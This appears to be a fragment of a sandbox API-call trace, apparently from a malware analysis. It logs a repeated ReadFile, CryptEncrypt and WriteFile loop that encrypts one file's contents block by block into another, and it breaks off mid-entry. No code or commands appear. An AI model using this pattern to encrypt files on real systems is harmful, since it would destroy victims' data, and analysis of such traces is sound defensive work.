[0270.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.156] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.156] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.157] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.157] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.157] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.157] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.158] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.158] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.158] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.158] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.158] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.158] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.158] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.158] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.158] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.158] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.158] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.158] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.158] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.159] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.159] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.159] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.159] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.159] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.159] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.159] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.159] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.159] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.159] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.160] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.160] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.160] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.160] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.161] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.161] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.161] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.161] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.161] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.162] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.162] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.162] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.162] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.162] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.163] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.163] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.163] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.163] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.163] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.163] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.163] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.163] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.163] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.163] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.163] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.163] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.163] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.163] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.163] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.164] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.164] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.164] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.164] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 